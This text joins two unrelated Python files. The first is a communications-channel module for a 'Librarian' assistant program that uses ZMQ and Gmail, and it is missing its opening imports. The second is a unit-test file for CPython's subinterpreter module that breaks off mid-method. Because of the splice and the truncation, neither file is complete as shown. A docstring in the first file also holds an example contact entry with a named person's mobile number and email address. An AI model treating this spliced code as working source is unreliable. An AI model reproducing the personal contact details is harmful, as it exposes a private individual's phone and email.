from helpers.comms.gmail import Gmail
from imagezmq import ImageHub, ImageSender
from queue import Queue, Empty, Full
from collections import deque
logger = logging.getLogger(__name__)
class QueryReceiver(ImageHub):
def __init__(self, open_port='tcp://127.0.0.1:5555', REQ_REP = True):
ImageHub.__init__(self, open_port=open_port)
def receive_query(self):
query, buf = self.recv_jpg()
return query # may return buf (binary buffer) in further development
class CommChannel:
""" Methods and attributes for a communications channel
Sets up a single communication channel, by creating an input method
that is specific to this channel using its settings. Then starts an
input thread and an output thread specific to this channel.
Each communications channel has its own unique versions of these 8 items:
1. channel.query_q to hold queries from channel until needed by Librarian
2. channel.reply_q to hold replies from Librarian to send via channel
3. channel.next_query method that returns next item in queries queue
4. channel.send_reply to send reply or new message via channel:
- In reply to a query
- To initiate a new conversation
(Most conversations are started by a User; but sometimes Librarian
will need to start a conversation, e.g., to send a timed reminder)
5. Thread for fetching input and putting it into query queue
6 Thread receiving output and putting it into output queue
7. Sender_ID, if known by input method (None, if not)
8. Sending program or process. For example, the CLI channel will need
the user to start a "CLI_chat.py" program that uses ZMQ to send
and receive messages. Sender programs are this same Communications
module.
Parameters:
channel (str): Channel name from settings yaml communications section.
Example channels include gmail and CLI, but can also
include audio
details (dict): Channel options & details specificed for this channel
"""
def __init__(self, settings, comm_channel, details):
# print('channel, details', channel)
# pprint.pprint(details)
self.query_q = None # replaced with a specific queue by channel setup
self.reply_q = None # ditto
if comm_channel.lower().strip() == 'gmail': # set up gmail
self.setup_gmail(settings, comm_channel, details)
elif comm_channel.lower().strip() == 'cli': # command line interface
self.setup_cli(comm_channel, details)
else:
raise YamlOptionsError('Unknown comm channel in yaml file.')
def next_query(self):
""" next_query: return the next query to Librarian
For each communication channel instance, this instance method gets
the next query in the queue for the channel. This assumes that each
channel must have a method or a thread that loads all inbound queries
for that channel.
Returns:
next item from self.query_q OR None if self.query_q is empty
"""
try:
query = self.query_q.get(block=False)
except Empty:
return None
else:
return query
def send_reply(self, reply):
""" send_reply: push the reply from the Librarian onto reply queue
This ia a placehoder method. It will be replaced with a channel
specific method as each channel is initialized.
Parameters:
reply: reply from Librarian to be send back channel
"""
pass # this method will be replaced with channel specific methods
def close(self):
""" close the communications channel
This is a placeholder method. It will be replaced with a chennel
specific close method as each channel is initialized.
"""
pass
def setup_cli(self, comm_channel, details):
""" setup_cli: set up the "8 items" for the CLI comm channel
Parameters:
comm_channel (dict): The dictionary holding options for CLI
details (dict): indiviual options in comm_channel
"""
# print the parameters to make sure they are what you think they are
# print('Contents of comm_channel:')
# pprint.pprint(comm_channel)
# print('Contents of details:')
# pprint.pprint(details)
self.name = 'CLI'
self.port = details.get('port', 5556) # CLI ZMQ port
maxsize = 2 # only need minimal queue for CLI
# first, set up query queue and start a query thread
self.query_q = Queue(maxsize=maxsize)
self.address = 'tcp://127.0.0.1:' + str(self.port).strip()
# print('CLI hub address is:', self.address)
self.q_r = QueryReceiver(open_port=self.address)
# start the thread receive CLI queries and put them into self.query_q
t = threading.Thread(target=self.CLI_query_put)
# print('Starting CLI threading')
t.daemon = True # allows this thread to be auto-killed on program exit
t.name = 'CLI QueryReceiver' # naming the thread helps with debugging
t.start()
# next, set up send_reply function specific to CLI.
self.reply_q = Queue(maxsize=maxsize) # queue for ZMQ REP replies
self.send_reply = self.CLI_send_reply # specific CLI_send_reply method
# finally, set the specific close function for CLI
self.close = self.q_r.close
def CLI_query_put(self):
""" CLI_query_put: receive query via QueryReceiver; put into self.query_q
Receives inbound CLI query from CLI_chat.py which runs as a separate
program. This methods runs in a Thread, loops forever and puts every
query received into the Librarian query_q. Waits until reply has been
sent (via ZMQ REP portion of REQ/REP cycle) before next receive_query.
"""
while True:
query = self.q_r.receive_query() # will block until CLI query recvd
self.query_q.put(query)
# Need to block here until REP has been sent in CLI_send_reply
self.OK = self.reply_q.get(block=True) # wait for reply...
# got the OK from CLI_send_reply so can fetch the next query
def CLI_send_reply(self, reply):
""" send_reply: push the CLI reply from the Librarian onto reply queue
Because only one CLI sender / receiver can exist at a time on a single
ZMQ port, there is no need for a reply queue. The reply is sent as the
REP portion of the ZMQ REQ/REP message pair
Parameters:
reply: reply from Librarian to be sent back to the CLI channel
"""
reply = reply.encode() # convert string to bytes to make ZMQ happy
self.q_r.send_reply(reply) # sends reply via ZMQ REP
self.reply_q.put('OK') # having sent the ZMQ REP, put OK into reply_q
# so that next REQ can be fetched in CLI_query_put()
def setup_gmail(self, settings, comm_channel, details):
""" setup_gmail: set up the "8 items" for the gmail comm channel
Parameters:
comm_channel (dict): The dictionary holding options for gmail
details (dict): indiviual options in comm_channel
"""
# print the parameters to make sure they are what you think they are
# print('Contents of comm_channel:')
# pprint.pprint(comm_channel)
# print('Contents of details:')
# pprint.pprint(details)
self.name = 'Gmail'
self.patience = settings.patience
self.port = details.get('port', 5559) # gmail ZMQ port
maxsize = 200 # size of Queue specific to Gmail queries
# first, set up query queue and start a query thread
self.address = 'tcp://127.0.0.1:' + str(self.port).strip()
# print('Gmail hub address is:', self.address)
self.q_r = QueryReceiver(open_port=self.address)
# start the process to receive gmail queries and put them into self.query_q
self.query_q = Queue(maxsize=maxsize)
t = threading.Thread(target=self.gmail_query_put)
# print('Starting gmail query receiver thread')
t.daemon = True # allows this thread to be auto-killed on program exit
t.name = 'Gmail QueryReceiver' # naming the thread helps with debugging
t.start()
# Start python gmail.py to wath gmail & send inbound queries to above
self.send_reply = self.gmail_send_reply # set a specific gemail method
# finally, set the specific close function for gmail
self.close = self.q_r.close
self.gmail = self.setup_gmail_sender(settings, details)
def gmail_query_put(self):
""" gmail_query_put: receive query via QueryReceiver; put into self.query_q
Receives inbound gmail query from gmail_watcher which runs as a separate
process. This methods runs in a Thread, loops forever and puts every
query received into the Librarian query_q.
"""
while True:
query = self.q_r.receive_query() # will block until gmail query recvd
self.query_q.put(query)
self.q_r.send_reply(b'OK') # sends reply acknoledgment via ZMQ REP
def setup_gmail_sender(self, settings, details):
""" Instantiates a GMail instance to be used by gmail_send_reply().
Parameters:
settings (Settings object): holds the settings from the yaml file
"""
gmail = None
gmail_dir = settings.lib_dir / Path('gmail') # gmail directory
# self.contacts = details.get('contacts', 'contacts.txt')
# details = {'contacts': 'contacts.txt', 'port': '5559'}
contacts = self.get_contacts(gmail_dir, details)
phones_OK_list = [contact.mobile_phone for contact in contacts]
emails_OK_list = [contact.email for contact in contacts]
# print('Phones:', *phones_OK_list)
# print('Emails:', *emails_OK_list)
# print('Instantiating Gmail().')
# print()
gmail = Gmail(settings, details, use_q_s=False) # no QuerySender needed
return gmail
def gmail_send_reply(self, reply):
""" send reply to gmail using gmail api
"""
# print("Simulating sending a reply to gmail:", reply.split("|", 1)[0])
self.gmail.gmail_send_reply(self.gmail.gmail, reply)
return
def get_contacts(self, gmail_dir, details):
"""Gets contacts from contacts data file
Example lines from contacts.txt for reference
name|full_name|canonical_name|mobile_phone|email
Jeff|Jeff Bass|jeff_bass|8054697213|jeffbass@me.com
Returns:
contacts, a list of named tuples of contact info
Example of extracting a single line
[contact.mobile_phone for contact in contacts if contact.name=='Jeff']
['8054697213']
"""
contacts_file = details.get('contacts', 'contacts.txt')
contacts_file = gmail_dir / Path(contacts_file)
# print('contacts file:', contacts_file )
with open(contacts_file, 'r') as f:
# read header line and set up namedtuple
lines = csv.reader(f, delimiter='|')
# fields = lines.next() # field names list from first line in file
fields = next(lines) # field names list from first line in file
Contact = namedtuple('Contact', fields)
# read all lines in file, creating a named tuple for each line in file
# if len(line) > 0 avoids TypeError due to any blank lines at end of file
contacts = [Contact(*line) for line in lines if len(line) > 0]
return contacts
|
test__xxsubinterpreters.py
|
from collections import namedtuple
import contextlib
import itertools
import os
import pickle
import sys
from textwrap import dedent
import threading
import time
import unittest
from test import support
from test.support import script_helper
interpreters = support.import_module('_xxsubinterpreters')
##################################
# helpers
def powerset(*sets):
return itertools.chain.from_iterable(
combinations(sets, r)
for r in range(len(sets)+1))
def _captured_script(script):
r, w = os.pipe()
indented = script.replace('\n', '\n ')
wrapped = dedent(f"""
import contextlib
with open({w}, 'w') as spipe:
with contextlib.redirect_stdout(spipe):
{indented}
""")
return wrapped, open(r)
def _run_output(interp, request, shared=None):
script, rpipe = _captured_script(request)
with rpipe:
interpreters.run_string(interp, script, shared)
return rpipe.read()
@contextlib.contextmanager
def _running(interp):
r1, w1 = os.pipe()
r2, w2 = os.pipe()
def run():
interpreters.run_string(interp, dedent(f"""
# signal that we're started
with open({w1}, mode='wb', buffering=0) as wpipe:
wpipe.write(b'0')
# wait for "signal" to finish
with open({r2}, mode='rb', buffering=0) as rpipe:
rpipe.read(1)
"""))
t = threading.Thread(target=run)
t.start()
# Wait for t to start:
with open(r1, mode='rb', buffering=0) as rpipe:
rpipe.read(1)
yield
with open(w2, mode='wb', buffering=0) as wpipe:
wpipe.write(b'1')
t.join()
#@contextmanager
#def run_threaded(id, source, **shared):
# def run():
# run_interp(id, source, **shared)
# t = threading.Thread(target=run)
# t.start()
# yield
# t.join()
def run_interp(id, source, **shared):
_run_interp(id, source, shared)
def _run_interp(id, source, shared, _mainns={}):
source = dedent(source)
main = interpreters.get_main()
if main == id:
if interpreters.get_current() != main:
raise RuntimeError
# XXX Run a func?
exec(source, _mainns)
else:
interpreters.run_string(id, source, shared)
def run_interp_threaded(id, source, **shared):
def run():
_run(id, source, shared)
t = threading.Thread(target=run)
t.start()
t.join()
class Interpreter(namedtuple('Interpreter', 'name id')):
@classmethod
def from_raw(cls, raw):
if isinstance(raw, cls):
return raw
elif isinstance(raw, str):
return cls(raw)
else:
raise NotImplementedError
def __new__(cls, name=None, id=None):
main = interpreters.get_main()
if id == main:
if not name:
name = 'main'
elif name != 'main':
raise ValueError(
'name mismatch (expected "main", got "{}")'.format(name))
id = main
elif id is not None:
if not name:
name = 'interp'
elif name == 'main':
raise ValueError('name mismatch (unexpected "main")')
if not isinstance(id, interpreters.InterpreterID):
id = interpreters.InterpreterID(id)
elif not name or name == 'main':
name = 'main'
id = main
else:
id = interpreters.create()
self = super().__new__(cls, name, id)
return self
# XXX expect_channel_closed() is unnecessary once we improve exc propagation.
@contextlib.contextmanager
def expect_channel_closed():
try:
yield
except interpreters.ChannelClosedError:
pass
else:
assert False, 'channel not closed'
class ChannelAction(namedtuple('ChannelAction', 'action end interp')):
def __new__(cls, action, end=None, interp=None):
if not end:
end = 'both'
if not interp:
interp = 'main'
self = super().__new__(cls, action, end, interp)
return self
def __init__(self, *args, **kwargs):
if self.action == 'use':
if self.end not in ('same', 'opposite', 'send', 'recv'):
raise ValueError(self.end)
elif self.action in ('close', 'force-close'):
if self.end not in ('both', 'same', 'opposite', 'send', 'recv'):
raise ValueError(self.end)
else:
raise ValueError(self.action)
if self.interp not in ('main', 'same', 'other', 'extra'):
raise ValueError(self.interp)
def resolve_end(self, end):
if self.end == 'same':
return end
elif self.end == 'opposite':
return 'recv' if end == 'send' else 'send'
else:
return self.end
def resolve_interp(self, interp, other, extra):
if self.interp == 'same':
return interp
elif self.interp == 'other':
if other is None:
raise RuntimeError
return other
elif self.interp == 'extra':
if extra is None:
raise RuntimeError
return extra
elif self.interp == 'main':
if interp.name == 'main':
return interp
elif other and other.name == 'main':
return other
else:
raise RuntimeError
# Per __init__(), there aren't any others.
class ChannelState(namedtuple('ChannelState', 'pending closed')):
def __new__(cls, pending=0, *, closed=False):
self = super().__new__(cls, pending, closed)
return self
def incr(self):
return type(self)(self.pending + 1, closed=self.closed)
def decr(self):
return type(self)(self.pending - 1, closed=self.closed)
def close(self, *, force=True):
if self.closed:
if not force or self.pending == 0:
return self
return type(self)(0 if force else self.pending, closed=True)
def run_action(cid, action, end, state, *, hideclosed=True):
if state.closed:
if action == 'use' and end == 'recv' and state.pending:
expectfail = False
else:
expectfail = True
else:
expectfail = False
try:
result = _run_action(cid, action, end, state)
except interpreters.ChannelClosedError:
if not hideclosed and not expectfail:
raise
result = state.close()
else:
if expectfail:
raise ... # XXX
return result
def _run_action(cid, action, end, state):
if action == 'use':
if end == 'send':
interpreters.channel_send(cid, b'spam')
return state.incr()
elif end == 'recv':
if not state.pending:
try:
interpreters.channel_recv(cid)
except interpreters.ChannelEmptyError:
return state
else:
raise Exception('expected ChannelEmptyError')
else:
interpreters.channel_recv(cid)
return state.decr()
else:
raise ValueError(end)
elif action == 'close':
kwargs = {}
if end in ('recv', 'send'):
kwargs[end] = True
interpreters.channel_close(cid, **kwargs)
return state.close()
elif action == 'force-close':
kwargs = {
'force': True,
}
if end in ('recv', 'send'):
kwargs[end] = True
interpreters.channel_close(cid, **kwargs)
return state.close(force=True)
else:
raise ValueError(action)
def clean_up_interpreters():
for id in interpreters.list_all():
if id == 0: # main
continue
try:
interpreters.destroy(id)
except RuntimeError:
pass # already destroyed
def clean_up_channels():
for cid in interpreters.channel_list_all():
try:
interpreters.channel_destroy(cid)
except interpreters.ChannelNotFoundError:
pass # already destroyed
class TestBase(unittest.TestCase):
def tearDown(self):
clean_up_interpreters()
clean_up_channels()
##################################
# misc. tests
class IsShareableTests(unittest.TestCase):
def test_default_shareables(self):
shareables = [
# singletons
None,
# builtin objects
b'spam',
'spam',
10,
-10,
]
for obj in shareables:
with self.subTest(obj):
self.assertTrue(
interpreters.is_shareable(obj))
def test_not_shareable(self):
class Cheese:
def __init__(self, name):
self.name = name
def __str__(self):
return self.name
class SubBytes(bytes):
"""A subclass of a shareable type."""
not_shareables = [
# singletons
True,
False,
NotImplemented,
...,
# builtin types and objects
type,
object,
object(),
Exception(),
100.0,
# user-defined types and objects
Cheese,
Cheese('Wensleydale'),
SubBytes(b'spam'),
]
for obj in not_shareables:
with self.subTest(repr(obj)):
self.assertFalse(
interpreters.is_shareable(obj))
class ShareableTypeTests(unittest.TestCase):
def setUp(self):
super().setUp()
self.cid = interpreters.channel_create()
def tearDown(self):
interpreters.channel_destroy(self.cid)
super().tearDown()
def _assert_values(self, values):
for obj in values:
with self.subTest(obj):
interpreters.channel_send(self.cid, obj)
got = interpreters.channel_recv(self.cid)
self.assertEqual(got, obj)
self.assertIs(type(got), type(obj))
# XXX Check the following in the channel tests?
#self.assertIsNot(got, obj)
def test_singletons(self):
for obj in [None]:
with self.subTest(obj):
interpreters.channel_send(self.cid, obj)
got = interpreters.channel_recv(self.cid)
# XXX What about between interpreters?
self.assertIs(got, obj)
def test_types(self):
self._assert_values([
b'spam',
9999,
self.cid,
])
def test_bytes(self):
self._assert_values(i.to_bytes(2, 'little', signed=True)
for i in range(-1, 258))
def test_strs(self):
self._assert_values(['hello world', '你好世界', ''])
def test_int(self):
self._assert_values(itertools.chain(range(-1, 258),
[sys.maxsize, -sys.maxsize - 1]))
def test_non_shareable_int(self):
ints = [
sys.maxsize + 1,
-sys.maxsize - 2,
2**1000,
]
for i in ints:
with self.subTest(i):
with self.assertRaises(OverflowError):
interpreters.channel_send(self.cid, i)
##################################
# interpreter tests
@unittest.skipUnderCinderJITNotFullFrame("T74839308 - doesn't work in tiny-frame mode")
class ListAllTests(TestBase):
def test_initial(self):
main = interpreters.get_main()
ids = interpreters.list_all()
self.assertEqual(ids, [main])
def test_after_creating(self):
main = interpreters.get_main()
first = interpreters.create()
second = interpreters.create()
ids = interpreters.list_all()
self.assertEqual(ids, [main, first, second])
def test_after_destroying(self):
main = interpreters.get_main()
first = interpreters.create()
second = interpreters.create()
interpreters.destroy(first)
ids = interpreters.list_all()
self.assertEqual(ids, [main, second])
@unittest.skipUnderCinderJITNotFullFrame("T74839308 - doesn't work in tiny-frame mode")
class GetCurrentTests(TestBase):
def test_main(self):
main = interpreters.get_main()
cur = interpreters.get_current()
self.assertEqual(cur, main)
self.assertIsInstance(cur, interpreters.InterpreterID)
def test_subinterpreter(self):
main = interpreters.get_main()
interp = interpreters.create()
out = _run_output(interp, dedent("""
import _xxsubinterpreters as _interpreters
cur = _interpreters.get_current()
print(cur)
assert isinstance(cur, _interpreters.InterpreterID)
"""))
cur = int(out.strip())
_, expected = interpreters.list_all()
self.assertEqual(cur, expected)
self.assertNotEqual(cur, main)
@unittest.skipUnderCinderJITNotFullFrame("T74839308 - doesn't work in tiny-frame mode")
class GetMainTests(TestBase):
def test_from_main(self):
[expected] = interpreters.list_all()
main = interpreters.get_main()
self.assertEqual(main, expected)
self.assertIsInstance(main, interpreters.InterpreterID)
def test_from_subinterpreter(self):
[expected] = interpreters.list_all()
interp = interpreters.create()
out = _run_output(interp, dedent("""
import _xxsubinterpreters as _interpreters
main = _interpreters.get_main()
print(main)
assert isinstance(main, _interpreters.InterpreterID)
"""))
main = int(out.strip())
self.assertEqual(main, expected)
@unittest.skipUnderCinderJITNotFullFrame("T74839308 - doesn't work in tiny-frame mode")
class IsRunningTests(TestBase):
def test_main(self):
main = interpreters.get_main()
self.assertTrue(interpreters.is_running(main))
def test_subinterpreter(self):
interp = interpreters.create()
self.assertFalse(interpreters.is_running(interp))
with _running(interp):
self.assertTrue(interpreters.is_running(interp))
self.assertFalse(interpreters.is_running(interp))
def test_from_subinterpreter(self):
interp = interpreters.create()
out = _run_output(interp, dedent(f"""
import _xxsubinterpreters as _interpreters
if _interpreters.is_running({interp}):
print(True)
else:
print(False)
"""))
self.assertEqual(out.strip(), 'True')
def test_already_destroyed(self):
interp = interpreters.create()
interpreters.destroy(interp)
with self.assertRaises(RuntimeError):
interpreters.is_running(interp)
def test_does_not_exist(self):
with self.assertRaises(RuntimeError):
interpreters.is_running(1_000_000)
def test_bad_id(self):
with self.assertRaises(ValueError):
interpreters.is_running(-1)
@unittest.skipUnderCinderJITNotFullFrame("T74839308 - doesn't work in tiny-frame mode")
class InterpreterIDTests(TestBase):
def test_with_int(self):
id = interpreters.InterpreterID(10, force=True)
self.assertEqual(int(id), 10)
def test_coerce_id(self):
class Int(str):
def __index__(self):
return 10
id = interpreters.InterpreterID(Int(), force=True)
self.assertEqual(int(id), 10)
def test_bad_id(self):
self.assertRaises(TypeError, interpreters.InterpreterID, object())
self.assertRaises(TypeError, interpreters.InterpreterID, 10.0)
self.assertRaises(TypeError, interpreters.InterpreterID, '10')
self.assertRaises(TypeError, interpreters.InterpreterID, b'10')
self.assertRaises(ValueError, interpreters.InterpreterID, -1)
self.assertRaises(OverflowError, interpreters.InterpreterID, 2**64)
def test_does_not_exist(self):
id = interpreters.channel_create()
with self.assertRaises(RuntimeError):
interpreters.InterpreterID(int(id) + 1) # unforced
def test_str(self):
id = interpreters.InterpreterID(10, force=True)
self.assertEqual(str(id), '10')
def test_repr(self):
id = interpreters.InterpreterID(10, force=True)
self.assertEqual(repr(id), 'InterpreterID(10)')
def test_equality(self):
id1 = interpreters.create()
id2 = interpreters.InterpreterID(int(id1))
id3 = interpreters.create()
self.assertTrue(id1 == id1)
self.assertTrue(id1 == id2)
self.assertTrue(id1 == int(id1))
self.assertTrue(int(id1) == id1)
self.assertTrue(id1 == float(int(id1)))
self.assertTrue(float(int(id1)) == id1)
self.assertFalse(id1 == float(int(id1)) + 0.1)
self.assertFalse(id1 == str(int(id1)))
self.assertFalse(id1 == 2**1000)
self.assertFalse(id1 == float('inf'))
self.assertFalse(id1 == 'spam')
self.assertFalse(id1 == id3)
self.assertFalse(id1 != id1)
self.assertFalse(id1 != id2)
self.assertTrue(id1 != id3)
@unittest.skipUnderCinderJITNotFullFrame("T74839308 - doesn't work in tiny-frame mode")
class CreateTests(TestBase):
def test_in_main(self):
id = interpreters.create()
self.assertIsInstance(id, interpreters.InterpreterID)
self.assertIn(id, interpreters.list_all())
@unittest.skip('enable this test when working on pystate.c')
def test_unique_id(self):
seen = set()
for _ in range(100):
id = interpreters.create()
interpreters.destroy(id)
seen.add(id)
self.assertEqual(len(seen), 100)
def test_in_thread(self):
lock = threading.Lock()
id = None
def f():
nonlocal id
id = interpreters.create()
lock.acquire()
lock.release()
t = threading.Thread(target=f)
with lock:
t.start()
t.join()
self.assertIn(id, interpreters.list_all())
def test_in_subinterpreter(self):
main, = interpreters.list_all()
id1 = interpreters.create()
out = _run_output(id1, dedent("""
import _xxsubinterpreters as _interpreters
id = _interpreters.create()
print(id)
assert isinstance(id, _interpreters.InterpreterID)
"""))
id2 = int(out.strip())
self.assertEqual(set(interpreters.list_all()), {main, id1, id2})
def test_in_threaded_subinterpreter(self):
main, = interpreters.list_all()
id1 = interpreters.create()
id2 = None
def f():
nonlocal id2
out = _run_output(id1, dedent("""
import _xxsubinterpreters as _interpreters
id = _interpreters.create()
print(id)
"""))
id2 = int(out.strip())
t = threading.Thread(target=f)
t.start()
t.join()
self.assertEqual(set(interpreters.list_all()), {main, id1, id2})
def test_after_destroy_all(self):
before = set(interpreters.list_all())
# Create 3 subinterpreters.
ids = []
for _ in range(3):
id = interpreters.create()
ids.append(id)
# Now destroy them.
for id in ids:
interpreters.destroy(id)
# Finally, create another.
id = interpreters.create()
self.assertEqual(set(interpreters.list_all()), before | {id})
def test_after_destroy_some(self):
before = set(interpreters.list_all())
# Create 3 subinterpreters.
id1 = interpreters.create()
id2 = interpreters.create()
id3 = interpreters.create()
# Now destroy 2 of them.
interpreters.destroy(id1)
interpreters.destroy(id3)
# Finally, create another.
id = interpreters.create()
self.assertEqual(set(interpreters.list_all()), before | {id, id2})
@unittest.skipUnderCinderJITNotFullFrame("T74839308 - doesn't work in tiny-frame mode")
class DestroyTests(TestBase):
def test_one(self):
id1 = interpreters.create()
id2 = interpreters.create()
id3 = interpreters.create()
self.assertIn(id2, interpreters.list_all())
interpreters.destroy(id2)
self.assertNotIn(id2, interpreters.list_all())
self.assertIn(id1, interpreters.list_all())
self.assertIn(id3, interpreters.list_all())
def test_all(self):
before = set(interpreters.list_all())
ids = set()
for _ in range(3):
id = interpreters.create()
ids.add(id)
self.assertEqual(set(interpreters.list_all()), before | ids)
for id in ids:
interpreters.destroy(id)
self.assertEqual(set(interpreters.list_all()), before)
def test_main(self):
main, = interpreters.list_all()
with self.assertRaises(RuntimeError):
interpreters.destroy(main)
def f():
with self.assertRaises(RuntimeError):
interpreters.destroy(main)
t = threading.Thread(target=f)
t.start()
t.join()
def test_already_destroyed(self):
id = interpreters.create()
interpreters.destroy(id)
with self.assertRaises(RuntimeError):
interpreters.destroy(id)
def test_does_not_exist(self):
with self.assertRaises(RuntimeError):
interpreters.destroy(1_000_000)
def test_bad_id(self):
with self.assertRaises(ValueError):
interpreters.destroy(-1)
def test_from_current(self):
main, = interpreters.list_all()
id = interpreters.create()
script = dedent(f"""
import _xxsubinterpreters as _interpreters
try:
_interpreters.destroy({id})
except RuntimeError:
pass
""")
interpreters.run_string(id, script)
self.assertEqual(set(interpreters.list_all()), {main, id})
def test_from_sibling(self):
main, = interpreters.list_all()
id1 = interpreters.create()
id2 = interpreters.create()
script = dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.destroy({id2})
""")
interpreters.run_string(id1, script)
self.assertEqual(set(interpreters.list_all()), {main, id1})
def test_from_other_thread(self):
id = interpreters.create()
def f():
interpreters.destroy(id)
t = threading.Thread(target=f)
t.start()
t.join()
def test_still_running(self):
main, = interpreters.list_all()
interp = interpreters.create()
with _running(interp):
self.assertTrue(interpreters.is_running(interp),
msg=f"Interp {interp} should be running before destruction.")
with self.assertRaises(RuntimeError,
msg=f"Should not be able to destroy interp {interp} while it's still running."):
interpreters.destroy(interp)
self.assertTrue(interpreters.is_running(interp))
@unittest.skipUnderCinderJITNotFullFrame("T74839308 - doesn't work in tiny-frame mode")
class RunStringTests(TestBase):
SCRIPT = dedent("""
with open('{}', 'w') as out:
out.write('{}')
""")
FILENAME = 'spam'
def setUp(self):
super().setUp()
self.id = interpreters.create()
self._fs = None
def tearDown(self):
if self._fs is not None:
self._fs.close()
super().tearDown()
@property
def fs(self):
if self._fs is None:
self._fs = FSFixture(self)
return self._fs
def test_success(self):
script, file = _captured_script('print("it worked!", end="")')
with file:
interpreters.run_string(self.id, script)
out = file.read()
self.assertEqual(out, 'it worked!')
def test_in_thread(self):
script, file = _captured_script('print("it worked!", end="")')
with file:
def f():
interpreters.run_string(self.id, script)
t = threading.Thread(target=f)
t.start()
t.join()
out = file.read()
self.assertEqual(out, 'it worked!')
def test_create_thread(self):
script, file = _captured_script("""
import threading
def f():
print('it worked!', end='')
t = threading.Thread(target=f)
t.start()
t.join()
""")
with file:
interpreters.run_string(self.id, script)
out = file.read()
self.assertEqual(out, 'it worked!')
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
def test_fork(self):
import tempfile
with tempfile.NamedTemporaryFile('w+') as file:
file.write('')
file.flush()
expected = 'spam spam spam spam spam'
script = dedent(f"""
import os
try:
os.fork()
except RuntimeError:
with open('{file.name}', 'w') as out:
out.write('{expected}')
""")
interpreters.run_string(self.id, script)
file.seek(0)
content = file.read()
self.assertEqual(content, expected)
def test_already_running(self):
with _running(self.id):
with self.assertRaises(RuntimeError):
interpreters.run_string(self.id, 'print("spam")')
def test_does_not_exist(self):
id = 0
while id in interpreters.list_all():
id += 1
with self.assertRaises(RuntimeError):
interpreters.run_string(id, 'print("spam")')
def test_error_id(self):
with self.assertRaises(ValueError):
interpreters.run_string(-1, 'print("spam")')
def test_bad_id(self):
with self.assertRaises(TypeError):
interpreters.run_string('spam', 'print("spam")')
def test_bad_script(self):
with self.assertRaises(TypeError):
interpreters.run_string(self.id, 10)
def test_bytes_for_script(self):
with self.assertRaises(TypeError):
interpreters.run_string(self.id, b'print("spam")')
@contextlib.contextmanager
def assert_run_failed(self, exctype, msg=None):
with self.assertRaises(interpreters.RunFailedError) as caught:
yield
if msg is None:
self.assertEqual(str(caught.exception).split(':')[0],
str(exctype))
else:
self.assertEqual(str(caught.exception),
"{}: {}".format(exctype, msg))
def test_invalid_syntax(self):
with self.assert_run_failed(SyntaxError):
# missing close paren
interpreters.run_string(self.id, 'print("spam"')
def test_failure(self):
with self.assert_run_failed(Exception, 'spam'):
interpreters.run_string(self.id, 'raise Exception("spam")')
def test_SystemExit(self):
with self.assert_run_failed(SystemExit, '42'):
interpreters.run_string(self.id, 'raise SystemExit(42)')
def test_sys_exit(self):
with self.assert_run_failed(SystemExit):
interpreters.run_string(self.id, dedent("""
import sys
sys.exit()
"""))
with self.assert_run_failed(SystemExit, '42'):
interpreters.run_string(self.id, dedent("""
import sys
sys.exit(42)
"""))
def test_with_shared(self):
r, w = os.pipe()
shared = {
'spam': b'ham',
'eggs': b'-1',
'cheddar': None,
}
script = dedent(f"""
eggs = int(eggs)
spam = 42
result = spam + eggs
ns = dict(vars())
del ns['__builtins__']
import pickle
with open({w}, 'wb') as chan:
pickle.dump(ns, chan)
""")
interpreters.run_string(self.id, script, shared)
with open(r, 'rb') as chan:
ns = pickle.load(chan)
self.assertEqual(ns['spam'], 42)
self.assertEqual(ns['eggs'], -1)
self.assertEqual(ns['result'], 41)
self.assertIsNone(ns['cheddar'])
def test_shared_overwrites(self):
interpreters.run_string(self.id, dedent("""
spam = 'eggs'
ns1 = dict(vars())
del ns1['__builtins__']
"""))
shared = {'spam': b'ham'}
script = dedent(f"""
ns2 = dict(vars())
del ns2['__builtins__']
""")
interpreters.run_string(self.id, script, shared)
r, w = os.pipe()
script = dedent(f"""
ns = dict(vars())
del ns['__builtins__']
import pickle
with open({w}, 'wb') as chan:
pickle.dump(ns, chan)
""")
interpreters.run_string(self.id, script)
with open(r, 'rb') as chan:
ns = pickle.load(chan)
self.assertEqual(ns['ns1']['spam'], 'eggs')
self.assertEqual(ns['ns2']['spam'], b'ham')
self.assertEqual(ns['spam'], b'ham')
def test_shared_overwrites_default_vars(self):
r, w = os.pipe()
shared = {'__name__': b'not __main__'}
script = dedent(f"""
spam = 42
ns = dict(vars())
del ns['__builtins__']
import pickle
with open({w}, 'wb') as chan:
pickle.dump(ns, chan)
""")
interpreters.run_string(self.id, script, shared)
with open(r, 'rb') as chan:
ns = pickle.load(chan)
self.assertEqual(ns['__name__'], b'not __main__')
def test_main_reused(self):
r, w = os.pipe()
interpreters.run_string(self.id, dedent(f"""
spam = True
ns = dict(vars())
del ns['__builtins__']
import pickle
with open({w}, 'wb') as chan:
pickle.dump(ns, chan)
del ns, pickle, chan
"""))
with open(r, 'rb') as chan:
ns1 = pickle.load(chan)
r, w = os.pipe()
interpreters.run_string(self.id, dedent(f"""
eggs = False
ns = dict(vars())
del ns['__builtins__']
import pickle
with open({w}, 'wb') as chan:
pickle.dump(ns, chan)
"""))
with open(r, 'rb') as chan:
ns2 = pickle.load(chan)
self.assertIn('spam', ns1)
self.assertNotIn('eggs', ns1)
self.assertIn('eggs', ns2)
self.assertIn('spam', ns2)
def test_execution_namespace_is_main(self):
r, w = os.pipe()
script = dedent(f"""
spam = 42
ns = dict(vars())
ns['__builtins__'] = str(ns['__builtins__'])
import pickle
with open({w}, 'wb') as chan:
pickle.dump(ns, chan)
""")
interpreters.run_string(self.id, script)
with open(r, 'rb') as chan:
ns = pickle.load(chan)
ns.pop('__builtins__')
ns.pop('__loader__')
self.assertEqual(ns, {
'__name__': '__main__',
'__annotations__': {},
'__doc__': None,
'__package__': None,
'__spec__': None,
'spam': 42,
})
# XXX Fix this test!
@unittest.skip('blocking forever')
def test_still_running_at_exit(self):
script = dedent(f"""
from textwrap import dedent
import threading
import _xxsubinterpreters as _interpreters
id = _interpreters.create()
def f():
_interpreters.run_string(id, dedent('''
import time
# Give plenty of time for the main interpreter to finish.
time.sleep(1_000_000)
'''))
t = threading.Thread(target=f)
t.start()
""")
with support.temp_dir() as dirname:
filename = script_helper.make_script(dirname, 'interp', script)
with script_helper.spawn_python(filename) as proc:
retcode = proc.wait()
self.assertEqual(retcode, 0)
##################################
# channel tests
class ChannelIDTests(TestBase):
def test_default_kwargs(self):
cid = interpreters._channel_id(10, force=True)
self.assertEqual(int(cid), 10)
self.assertEqual(cid.end, 'both')
def test_with_kwargs(self):
